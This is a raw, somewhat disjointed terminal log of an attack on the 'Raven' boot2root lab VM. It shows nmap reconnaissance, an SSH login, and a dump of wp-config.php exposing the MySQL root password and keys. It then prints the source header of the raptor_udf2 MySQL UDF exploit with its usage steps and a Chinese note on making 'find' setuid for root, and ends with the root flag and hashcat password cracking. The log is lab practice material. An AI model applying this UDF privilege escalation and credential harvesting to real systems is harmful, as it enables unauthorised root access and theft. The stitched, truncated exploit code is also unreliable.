root@kali:~# nmap -sn -v 192.168.56.0/24 Nmap scan report for 192.168.56.118 Host is up (0.00016s latency). MAC Address: 08:00:27:D2:E6:4F (Oracle VirtualBox virtual NIC)
root@kali:~# nmap -p- -sV -v -Pn 192.168.56.118 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 36286/tcp open status 1 (RPC #100024)
root@kali:~# nmap -p- -sU -Pn -v 192.168.56.118 --min-rate=10000 PORT STATE SERVICE 111/udp open rpcbind
root@kali:~# nmap -p 22,80,111,36286 -sV -v -Pn -A --script all 192.168.56.118 --min-rate=100000 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) |_banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4 |_clamav-exec: ERROR: Script execution failed (use -d to debug) | ssh-auth-methods: | Supported authentication methods: | publickey |_ password | ssh-brute: | Accounts: No valid accounts found |_ Statistics: Performed 0 guesses in 1807 seconds, average tps: 0.0 | ssh-hostkey: | 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA) | 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA) | 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA) |_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519) | ssh-publickey-acceptance: |_ Accepted Public Keys: No public keys accepted |_ssh-run: Failed to specify credentials and command to run. | ssh2-enum-algos: | kex_algorithms: (6) | curve25519-sha256@libssh.org | ecdh-sha2-nistp256 | ecdh-sha2-nistp384 | ecdh-sha2-nistp521 | diffie-hellman-group-exchange-sha256 | diffie-hellman-group14-sha1 | server_host_key_algorithms: (4) | ssh-rsa | ssh-dss | ecdsa-sha2-nistp256 | ssh-ed25519 | encryption_algorithms: (6) | aes128-ctr | aes192-ctr | aes256-ctr | aes128-gcm@openssh.com | aes256-gcm@openssh.com | chacha20-poly1305@openssh.com | mac_algorithms: (10) | umac-64-etm@openssh.com | umac-128-etm@openssh.com | hmac-sha2-256-etm@openssh.com | hmac-sha2-512-etm@openssh.com | hmac-sha1-etm@openssh.com | umac-64@openssh.com | umac-128@openssh.com | hmac-sha2-256 | hmac-sha2-512 | hmac-sha1 | compression_algorithms: (2) | none |_ zlib@openssh.com 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_citrix-brute-xml: FAILED: No domain specified (use ntdomain argument) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | http-brute: |_ Path "/" does not require authentication |_http-chrono: Request timesfor /; avg: 284.71ms; min: 236.36ms; max: 327.61ms | http-comments-displayer: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.118 | | Path: http://192.168.56.118:80/about.html | Line number: 16 | Comment: | <!-- Site Title --> | | Path: http://192.168.56.118:80/css/owl.carousel.css | Line number: 112 | Comment: | | | */ | | Path: http://192.168.56.118:80/css/main.css | Line number: 3425 | Comment: | /* | ################ | End Blog Details Page style | ################ | */ | | Path: http://192.168.56.118:80/css/main.css | Line number: 1989 | Comment: | /* Nav Menu Essentials */ | | Path: http://192.168.56.118:80/css/main.css | Line number: 2028 | Comment: | /* Nav Menu Arrows */ | | Path: http://192.168.56.118:80/css/main.css | Line number: 10 | Comment: | /* Code for Firefox */ | | Path: http://192.168.56.118:80/about.html | Line number: 196 | Comment: | <!-- Start team Area --> | | Path: http://192.168.56.118:80/css/owl.carousel.css | Line number: 81 | Comment: | | | */ | | Path: http://192.168.56.118:80/about.html | Line number: 12 | Comment: | <!-- Meta Keyword --> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 150 | Comment: | <!-- #colophon --> | | Path: http://192.168.56.118:80/js/jquery.counterup.min.js | Line number: 1 | Comment: | /*! | * jquery.counterup.js 1.0 | * | * Copyright 2013, Benjamin Intal http://gambit.ph @bfintal | * Released under the GPL v2 License | * | * Date: Nov 26, 2013 | */ | | Path: http://192.168.56.118:80/css/main.css | Line number: 106 | Comment: | /** | * Typography | * | **/ | | Path: http://192.168.56.118:80/js/waypoints.min.js | Line number: 2 | Comment: | /* | jQuery Waypoints - v2.0.3 | Copyright (c) 2011-2013 Caleb Troughton | Dual licensed under the MIT license and GPL license. | https://github.com/imakewebthings/jquery-waypoints/blob/master/licenses.txt | */ | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 15 | Comment: | // request type html/json/xml | | Path: http://192.168.56.118:80/about.html | Line number: 4 | Comment: | <!-- Mobile Specific Meta --> | | Path: http://192.168.56.118:80/css/main.css | Line number: 1 | Comment: | /*--------------------------- Color variations ----------------------*/ | | Path: http://192.168.56.118:80/css/main.css | Line number: 7 | Comment: | /* Basic Style | /* =================================== */ | | Path: http://192.168.56.118:80/css/main.css | Line number: 47 | Comment: | /* Microsoft Edge */ | | Path: http://192.168.56.118:80/css/main.css | Line number: 2208 | Comment: | /* Mobile Nav body classes */ | | Path: http://192.168.56.118:80/wordpress/ | Line number: 107 | Comment: | <!-- #main --> | | Path: http://192.168.56.118:80/css/main.css | Line number: 2057 | Comment: | /* Nav Meu Styling */ | | Path: http://192.168.56.118:80/wordpress/ | Line number: 75 | Comment: | <!-- .site-branding --> | | Path: http://192.168.56.118:80/contact.php | Line number: 148 | Comment: | <!-- End contact-page Area --> | | Path: http://192.168.56.118:80/index.html | Line number: 291 | Comment: | <!-- End galery Area --> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 156 | Comment: | /* ]]> */ | | Path: http://192.168.56.118:80/css/owl.carousel.css | Line number: 129 | Comment: | | | */ | | Path: http://192.168.56.118:80/wordpress/ | Line number: 154 | Comment: | /* <![CDATA[ */ | | Path: http://192.168.56.118:80/js/jquery.sticky.js | Line number: 8 | Comment: | | // Website: http://labs.anthonygarand.com/sticky | | Path: http://192.168.56.118:80/wordpress/ | Line number: 152 | Comment: | <!-- #page --> | | Path: http://192.168.56.118:80/css/main.css | Line number: 34 | Comment: | /* Mozilla Firefox 19+ */ | | Path: http://192.168.56.118:80/js/superfish.min.js | Line number: 1 | Comment: | /* | * jQuery Superfish Menu Plugin - v1.7.9 | * Copyright (c) 2016 Joel Birch | * | * Dual licensed under the MIT and GPL licenses: | * http://www.opensource.org/licenses/mit-license.php | * http://www.gnu.org/licenses/gpl.html | */ | | Path: http://192.168.56.118:80/css/main.css | Line number: 4 | Comment: | /* Mobile Layout: 320px */ | | Path: http://192.168.56.118:80/js/jquery.sticky.js | Line number: 6 | Comment: | | // Created: 2/14/2011 | | Path: http://192.168.56.118:80/css/main.css | Line number: 27 | Comment: | /* Mozilla Firefox 4 to 18 */ | | Path: http://192.168.56.118:80/wordpress/ | Line number: 141 | Comment: | <!-- #content --> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 80 | Comment: | <!-- #masthead --> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 137 | Comment: | <!-- #secondary --> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 105 | Comment: | <!-- #post-## --> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 108 | Comment: | <!-- #primary --> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 102 | Comment: | <!-- .entry-content --> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 97 | Comment: | <!-- .entry-header --> | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 16 | Comment: | // serialize form data | | Path: http://192.168.56.118:80/css/main.css | Line number: 6 | Comment: | /* =================================== */ | | Path: http://192.168.56.118:80/index.html | Line number: 210 | Comment: | <!-- End feature Area --> | | Path: http://192.168.56.118:80/css/main.css | Line number: 3 | Comment: | /* Tablet Layout: 768px */ | | Path: http://192.168.56.118:80/css/owl.carousel.css | Line number: 77 | Comment: | /* No Js */ | | Path: http://192.168.56.118:80/css/owl.carousel.css | Line number: 118 | Comment: | | | */ | | Path: http://192.168.56.118:80/wordpress/ | Line number: 77 | Comment: | <!-- .custom-header --> | | Path: http://192.168.56.118:80/js/jquery.sticky.js | Line number: 140 | Comment: | // should be more efficient than using $window.scroll(scroller) and $window.resize(resizer): | | Path: http://192.168.56.118:80/css/main.css | Line number: 21 | Comment: | /* WebKit, Blink, Edge */ | | Path: http://192.168.56.118:80/js/jquery.magnific-popup.min.js | Line number: 1 | Comment: | /*! Magnific Popup - v1.1.0 - 2016-02-20 | * http://dimsemenov.com/plugins/magnific-popup/ | * Copyright (c) 2016 Dmitry Semenov; */ | | Path: http://192.168.56.118:80/css/main.css | Line number: 2 | Comment: | /* Medium Layout: 1280px */ | | Path: http://192.168.56.118:80/wordpress/ | Line number: 70 | Comment: | <!-- .site-branding-text --> | | Path: http://192.168.56.118:80/about.html | Line number: 14 | Comment: | <!-- meta character set --> | | Path: http://192.168.56.118:80/about.html | Line number: 269 | Comment: | <!-- start footer Area --> | | Path: http://192.168.56.118:80/css/main.css | Line number: 41 | Comment: | /* Internet Explorer 10-11 */ | | Path: http://192.168.56.118:80/css/linearicons.css | Line number: 22 | Comment: | /* Better Font Rendering =========== */ | | Path: http://192.168.56.118:80/about.html | Line number: 74 | Comment: | <!-- start banner Area --> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 39 | Comment: | <!--[if lt IE 9]> | <script type='text/javascript' src='http://raven.local/wordpress/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=3.7.3'></script> | <![endif]--> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 36 | Comment: | <!--[if lt IE 9]> | <link rel='stylesheet'id='twentyseventeen-ie8-css' href='http://raven.local/wordpress/wp-content/themes/twentyseventeen/assets/css/ie8.css?ver=1.0'type='text/css' media='all' /> | <![endif]--> | | Path: http://192.168.56.118:80/js/jquery.nice-select.min.js | Line number: 1 | Comment: | /* jQuery Nice Select - v1.0 | https://github.com/hernansartorio/jquery-nice-select | Made by Hern\xC3\xA1n Sartorio */ | | Path: http://192.168.56.118:80/css/owl.carousel.css | Line number: 6 | Comment: | | | */ | | Path: http://192.168.56.118:80/wordpress/ | Line number: 97 | Comment: | <!-- .entry-meta --> | | Path: http://192.168.56.118:80/css/owl.carousel.css | Line number: 29 | Comment: | /* fix for flashing background */ | | Path: http://192.168.56.118:80/css/owl.carousel.css | Line number: 13 | Comment: | /* position relative and z-index fix webkit rendering fonts issue */ | | Path: http://192.168.56.118:80/css/main.css | Line number: 2101 | Comment: | /* Mobile Nav Toggle */ | | Path: http://192.168.56.118:80/index.html | Line number: 368 | Comment: | <!-- End blog Area --> | | Path: http://192.168.56.118:80/about.html | Line number: 20 | Comment: | <!-- | CSS | ============================================= --> | | Path: http://192.168.56.118:80/js/parallax.min.js | Line number: 1 | Comment: | /*! | * parallax.js v1.5.0 (http://pixelcog.github.io/parallax.js/) | * @copyright 2016 PixelCog, Inc. | * @license MIT (https://github.com/pixelcog/parallax.js/blob/master/LICENSE) | */ | | Path: http://192.168.56.118:80/js/jquery.ajaxchimp.min.js | Line number: 103 | Comment: | // Translate and display submit message | | Path: http://192.168.56.118:80/js/jquery.ajaxchimp.min.js | Line number: 69 | Comment: | // Translate and display message | | Path: http://192.168.56.118:80/wordpress/ | Line number: 151 | Comment: | <!-- .site-content-contain --> | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 10 | Comment: | // prevent default form submit | | Path: http://192.168.56.118:80/wordpress/ | Line number: 148 | Comment: | <!-- .site-info --> | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 23 | Comment: | // reset form | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 22 | Comment: | // fade in response data | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 14 | Comment: | // form submit method get/post | | Path: http://192.168.56.118:80/about.html | Line number: 10 | Comment: | <!-- Meta Description --> | | Path: http://192.168.56.118:80/about.html | Line number: 68 | Comment: | <!-- #nav-menu-container --> | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 19 | Comment: | // change submit button text | | Path: http://192.168.56.118:80/css/main.css | Line number: 167 | Comment: | /** | * For modern browsers | * 1. The space content is one way to avoid an Opera bug when the | * contenteditable attribute is included anywhere elsein the document. | * Otherwise it causes space to appear at the top and bottom of elements | * that are clearfixed. | * 2. The use of `table` rather than `block` is only necessary if using | * `:before` to contain the top-margins of child elements. | */ | | Path: http://192.168.56.118:80/index.html | Line number: 150 | Comment: | <!-- Start feature Area --> | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 13 | Comment: | // form action url | | Path: http://192.168.56.118:80/about.html | Line number: 280 | Comment: | <!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. --> | | Path: http://192.168.56.118:80/js/jquery.sticky.js | Line number: 4 | Comment: | | // Improvements by German M. Bravo (Kronuz) and Ruud Kamphuis (ruudk) | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 8 | Comment: | // form submit event | | Path: http://192.168.56.118:80/about.html | Line number: 90 | Comment: | <!-- Start about-top Area --> | | Path: http://192.168.56.118:80/about.html | Line number: 167 | Comment: | <!-- Start fact Area --> | | Path: http://192.168.56.118:80/about.html | Line number: 111 | Comment: | <!-- Start service Area --> | | Path: http://192.168.56.118:80/css/main.css | Line number: 3306 | Comment: | /* | ################ | Start Blog Details Page style | ################ | */ | | Path: http://192.168.56.118:80/contact.php | Line number: 89 | Comment: | <!-- Start contact-page Area --> | | Path: http://192.168.56.118:80/css/main.css | Line number: 3301 | Comment: | /* | ################ | End Blog Home Page style | ################ | */ | | Path: http://192.168.56.118:80/css/owl.carousel.css | Line number: 1 | Comment: | | | | | */ | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 4 | Comment: | // contact form | | Path: http://192.168.56.118:80/about.html | Line number: 8 | Comment: | <!-- Author Meta --> | | Path: http://192.168.56.118:80/about.html | Line number: 267 | Comment: | <!-- End team Area --> | | Path: http://192.168.56.118:80/wordpress/ | Line number: 74 | Comment: | <!-- .wrap --> | | Path: http://192.168.56.118:80/css/main.css | Line number: 2046 | Comment: | /* Nav Meu Container */ | | Path: http://192.168.56.118:80/about.html | Line number: 165 | Comment: | <!-- End service Area --> | | Path: http://192.168.56.118:80/css/main.css | Line number: 5 | Comment: | /* Wide Mobile Layout: 480px */ | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 5 | Comment: | // submit button | | Path: http://192.168.56.118:80/about.html | Line number: 318 | Comment: | <!-- End footer Area --> | | Path: http://192.168.56.118:80/js/jquery.sticky.js | Line number: 2 | Comment: | | // ============= | | Path: http://192.168.56.118:80/about.html | Line number: 110 | Comment: | <!-- End about-top Area --> | | Path: http://192.168.56.118:80/about.html | Line number: 194 | Comment: | <!-- end fact Area --> | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 1 | Comment: | // ------- Mail Send ajax | | Path: http://192.168.56.118:80/js/jquery.sticky.js | Line number: 10 | Comment: | | // It will only set the 'top' and 'position' of your element, you | | Path: http://192.168.56.118:80/css/main.css | Line number: 3065 | Comment: | /* | ################ | Start Blog Home Page style | ################ | */ | | Path: http://192.168.56.118:80/css/bootstrap.css | Line number: 1 | Comment: | /*! | * Bootstrap v4.0.0-beta (https://getbootstrap.com) | * Copyright 2011-2017 The Bootstrap Authors | * Copyright 2011-2017 Twitter, Inc. | * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) | */ | | Path: http://192.168.56.118:80/index.html | Line number: 293 | Comment: | <!-- Start blog Area --> | | Path: http://192.168.56.118:80/css/main.css | Line number: 1875 | Comment: | /*-------------------------------------------------------------- | # Header | --------------------------------------------------------------*/ | | Path: http://192.168.56.118:80/css/main.css | Line number: 2130 | Comment: | /* Mobile Nav Styling */ | | Path: http://192.168.56.118:80/about.html | Line number: 6 | Comment: | <!-- Favicon--> | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 6 | Comment: | // alert div for show alert message | | Path: http://192.168.56.118:80/css/main.css | Line number: 1986 | Comment: | /*-------------------------------------------------------------- | # Navigation Menu | --------------------------------------------------------------*/ | | Path: http://192.168.56.118:80/about.html | Line number: 71 | Comment: | <!-- #header --> | | Path: http://192.168.56.118:80/about.html | Line number: 88 | Comment: | <!-- End banner Area --> | | Path: http://192.168.56.118:80/js/mail-script.js | Line number: 24 | Comment: | // reset submit button text | | Path: http://192.168.56.118:80/index.html | Line number: 241 | Comment: |_ <!-- Start galery Area --> | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.118 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.56.118:80/ | Form id: | Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01 | | Path: http://192.168.56.118:80/contact.php | Form id: myform | Form action: | | Path: http://192.168.56.118:80/contact.php | Form id: | Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01 | | Path: http://192.168.56.118:80/team.html | Form id: | Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01 | | Path: http://192.168.56.118:80/index.html | Form id: | Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01 | | Path: http://192.168.56.118:80/about.html | Form id: | Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01 | | Path: http://192.168.56.118:80/wordpress/ | Form id: search-form-5e446a40901ba |_ Form action: http://raven.local/wordpress/ |_http-date: Wed, 12 Feb 2020 21:12:24 GMT; +8h00m00s from local time. |_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /wordpress/: Blog | /wordpress/wp-login.php: Wordpress login page. | /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' | /img/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' | /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' | /manual/: Potentially interesting folder |_ /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' | http-errors: | Spidering limited to: maxpagecount=40; withinhost=192.168.56.118 | Found the following error pages: | | Error Code: 404 | http://192.168.56.118:80/blog-single.html | | Error Code: 404 | http://192.168.56.118:80/contact.html | | Error Code: 404 |_ http://192.168.56.118:80/wordpress/%5c%22 |_http-feed: ERROR: Script execution failed (use -d to debug) |_http-fetch: Please enter the complete path of the directory to save data in. | http-grep: | (1) http://192.168.56.118:80/contact.php: | (1) email: | + support@codethemes.com | (1) http://192.168.56.118:80/blog-single.html: | (1) ip: |_ + 192.168.56.118 | http-headers: | Date: Wed, 12 Feb 2020 21:12:23 GMT | Server: Apache/2.4.10 (Debian) | Last-Modified: Sun, 12 Aug 2018 22:29:32 GMT | ETag: "41b3-5734482bdcb00" | Accept-Ranges: bytes | Content-Length: 16819 | Vary: Accept-Encoding | Connection: close | Content-Type: text/html | |_ (Request type: HEAD) |_http-malware-host: Host appears to be clean | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-mobileversion-checker: No mobile version detected. | http-referer-checker: | Spidering limited to: maxpagecount=30 |_ https://cdnjs.cloudflare.com:443/ajax/libs/popper.js/1.12.9/umd/popper.min.js |_http-security-headers: | http-sitemap-generator: | Directory structure: | / | Other: 1; html: 1 | /css/ | css: 6 | /img/ | jpg: 4; png: 1 | /js/ | js: 5 | /wordpress/ | Other: 1 | Longest directory structure: | Depth: 1 | Dir: /css/ | Total files found (by extension): |_ Other: 2; css: 6; html: 1; jpg: 4; js: 5; png: 1 |_http-slowloris: false |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-title: Raven Security | http-traceroute: |_ Possible reverse proxy detected. | http-useragent-tester: | Status for browser useragent: 200 | Allowed User Agents: | Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) | libwww | lwp-trivial | libcurl-agent/1.0 | PHP/ | Python-urllib/2.5 | GT::WWW | Snoopy | MFC_Tear_Sample | HTTP::Lite | PHPCrawl | URI::Fetch | Zend_Http_Client | http client | PECL::HTTP | Wget/1.13.4 (linux-gnu) |_ WWW-Mechanize/1.34 | http-vhosts: | 126 names had status 200 |_ftp0 |_http-xssed: ERROR: Script execution failed (use -d to debug) 111/tcp open rpcbind 2-4 (RPC #100000) |_clamav-exec: ERROR: Script execution failed (use -d to debug) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 36286/tcp status | 100024 1 43516/udp status | 100024 1 46344/udp6 status |_ 100024 1 56752/tcp6 status 36286/tcp open status 1 (RPC #100024) |_clamav-exec: ERROR: Script execution failed (use -d to debug)
root@kali:~# ssh michael@192.168.56.118 The authenticity of host '192.168.56.118 (192.168.56.118)' can't be established. ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.118' (ECDSA) to the list of known hosts. Enter passphrase for key '/root/.ssh/id_rsa': michael@192.168.56.118's password:
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have new mail. michael@Raven:~$ id uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev) michael@Raven:~$ whoami michael
michael@Raven:/tmp$ cd /var/www/html/wordpress michael@Raven:/var/www/html/wordpress$ ls index.php wp-activate.php wp-comments-post.php wp-content wp-links-opml.php wp-mail.php wp-trackback.php license.txt wp-admin wp-config.php wp-cron.php wp-load.php wp-settings.php xmlrpc.php readme.html wp-blog-header.php wp-config-sample.php wp-includes wp-login.php wp-signup.php michael@Raven:/var/www/html/wordpress$ cat wp-con wp-config.php wp-config-sample.php wp-content/ michael@Raven:/var/www/html/wordpress$ cat wp-config.php <?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'root'); /** MySQL database password */ define('DB_PASSWORD', 'R@v3nSecurity'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8mb4'); /** The Database Collate type. Don't change this ifin doubt. */ define('DB_COLLATE', '');
/**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to login again. * * @since 2.6.0 */ define('AUTH_KEY', '0&ItXmn^q2d[e*yB:9,L:rR<B`h+DG,zQ&SN{Or3zalh.JE+Q!Gi:L7U[(T:J5ay'); define('SECURE_AUTH_KEY', 'y@^[*q{)NKZAKK{,AA4y-Ia*swA6/O@&*r{+RS*N!p1&a$*ctt+ I/!?A/Tip(BG'); define('LOGGED_IN_KEY', '.D4}RE4rW2C@9^Bp%#U6i)?cs7,@e]YD:R~fp#hXOk$4o/yDO8b7I&/F7SBSLPlj'); define('NONCE_KEY', '4L{Cq,%ce2?RRT7zue#R3DezpNq4sFvcCzF@zdmgL/fKpaGX:EpJt/]xZW1_H&46'); define('AUTH_SALT', '@@?u*YKtt:o/T&V;cbb`.GaJ0./S@dn$t2~n+lR3{PktK]2,*y/b%<BH-Bd#I}oE'); define('SECURE_AUTH_SALT', 'f0Dc#lKmEJi(:-3+x.V#]Wy@mCmp%njtmFb6`_80[8FK,ZQ=+HH/$& mn=]=/cvd'); define('LOGGED_IN_SALT', '}STRHqy,4scy7v >-..Hc WD*h7rnYq]H`-glDfTVUaOwlh!-/?=3u;##:Rj1]7@'); define('NONCE_SALT', 'i(#~[sXA TbJJfdn&D;0bd`p$r,~.o/?%m<H+<>Vj+,nLvX!-jjjV-o6*HDh5Td{');
/**#@-*/
/** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_';
/** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');
/* * $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $ * * raptor_udf2.c - dynamic library for do_system() MySQL UDF * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * * This is an helper dynamic library forlocal privilege escalation through * MySQL run with root privileges (very bad idea!), slightly modified to work * with newer versions of the open-source database. Tested on MySQL 4.1.14. * * See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c * * Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes * for the security vulnerabilities in the handling of User Defined Functions * (UDFs) reported by Stefano Di Paola <stefano.dipaola@wisec.it>. For further * details, please refer to: * * http://dev.mysql.com/doc/refman/5.0/en/udf-security.html * http://www.wisec.it/vulns.php?page=4 * http://www.wisec.it/vulns.php?page=5 * http://www.wisec.it/vulns.php?page=6 * * "UDFs should have at least one symbol defined in addition to the xxx symbol * that corresponds to the main xxx() function. These auxiliary symbols * correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and * xxx_add() functions". -- User Defined Functions Security Precautions * * Usage: * $ id * uid=500(raptor) gid=500(raptor) groups=500(raptor) * $ gcc -g -c raptor_udf2.c * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc * $ mysql -u root -p * Enter password: * [...] * mysql> use mysql; * mysql> create table foo(line blob); * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so')); * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so'; * mysql> create function do_system returns integer soname 'raptor_udf2.so'; * mysql> select * from mysql.func; * +-----------+-----+----------------+----------+ * | name | ret | dl | type | * +-----------+-----+----------------+----------+ * | do_system | 2 | raptor_udf2.so | function | * +-----------+-----+----------------+----------+ * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out'); * mysql> \! sh * sh-2.05b$ cat /tmp/out * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm) * [...] * * E-DB Note: Keep an eye on https://github.com/mysqludf/lib_mysqludf_sys * */
typedef struct st_udf_args { unsigned int arg_count; // number of arguments enum Item_result *arg_type; // pointer to item_result char **args; // pointer to arguments unsigned long *lengths; // length of string args char *maybe_null; // 1 for maybe_null args } UDF_ARGS;
typedef struct st_udf_init { char maybe_null; // 1 if func can return NULL unsigned int decimals; // for real functions unsigned long max_length; // for string functions char *ptr; // free ptr for func data char const_item; // 0 if result is constant } UDF_INIT;
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) { if (args->arg_count != 1) return(0);
michael@Raven:/tmp$ mysql -uroot -pR@v3nSecurity Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 70 Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
mysql> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed
现在,创建一个名为“foo”的表在此表中,将链接插入了刚刚从本地计算机导入到/tmp目录的1518.so文件。将相同的文件转储到/usr/lib/mysql/plugin/目录(因为它容易受到攻击)在最重要的步骤中,创建了一个名为do_system的UDF函数,该函数将调用实现该函数的代码。因此,正在调用代码“chmod u + s /usr/bin/ find”以将粘性位设置为“find”
| // _` \ \ / / _ \ '_ \ | |\ \ (_| |\ V / __/ | | | \_| \_\__,_| \_/ \___|_| |_| flag4{715dea6c055b9fe3337544932f2941ce} CONGRATULATIONS on successfully rooting Raven! This is my first Boot2Root VM - I hope you enjoyed it. Hit me up on Twitter and let me know what you thought: @mccannwj / wjmccann.github.io
mysql> use wordpress; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 400 password.txt D:/wordlists/rockyou.txt hashcat (v5.1.0) starting...
* Device #1: WARNING! Kernel exec timeout is not disabled. This may cause "CL_OUT_OF_RESOURCES" or related errors. To disable the timeout, see: https://hashcat.net/q/timeoutpatch * Device #2: Intel's OpenCL runtime (GPU only) is currently broken. We are waiting for updated OpenCL drivers from Intel. You can use --force to override, but do not report related errors. nvmlInit(): Unknown Error
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline.
